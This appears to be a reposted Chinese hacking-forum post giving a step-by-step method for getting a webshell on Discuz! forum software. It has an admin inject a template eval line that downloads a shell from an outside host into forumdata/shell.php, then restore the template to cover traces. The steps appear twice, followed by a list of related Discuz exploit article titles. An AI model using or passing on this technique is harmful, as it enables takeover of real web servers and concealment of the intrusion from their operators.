转载自t00ls.net
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.abc.com/shell.txt
3. 在任意位置输入:
{eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样
大功告成, 访问/forumdata/shell.php便是可爱的马马。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.abc.com/shell.txt
3. 在任意位置输入:
{eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样
大功告成, 访问/forumdata/shell.php便是可爱的马马。
只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 22639, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22315, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16909, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14464, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46381, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50185, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23270, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15976, 评论: 0)
dz~~~~马后炮 (浏览: 10679, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11779, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22315, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16909, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14464, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46381, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50185, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23270, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15976, 评论: 0)
dz~~~~马后炮 (浏览: 10679, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11779, 评论: 0)